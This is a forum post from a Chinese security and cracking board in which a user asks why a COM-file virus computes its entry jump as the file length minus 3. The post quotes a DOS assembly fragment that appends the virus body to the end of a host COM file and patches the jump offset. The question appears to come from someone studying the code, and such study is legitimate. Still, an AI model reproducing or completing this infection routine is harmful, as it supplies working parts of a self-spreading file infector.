|
 | 作者: seny11 [seny11]
 论坛用户 |
登录 |
| 感染com文件的:为什么那个文件长度-3是(写入文件头的)jmp的病毒入口地址 --------------------------- ....... mov ax,4202h xor cx,cx xor dx,dx int 21h ;将文件指针移到文件尾,返回dx:ax=文件长度 or dx,dx jnz short @@CloseComFile ;文件太大不感染 mov dx,ax add ax,VirusSize jc short @@CloseComFile ;文件太大不感染 cmp ax,0fd00h ja short @@CloseComFile ;文件太大不感染 sub dx,03 ;计算出Jmp Virus的偏移量 mov ds:JmpOffset,dx lea dx,@@Start mov cx,VirusSize mov ah,40h int 21h ;将病毒写到文件尾部 |
| 地主 发表时间: 06-05-22 05:38 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 编程破解
标题: 这个程序的问题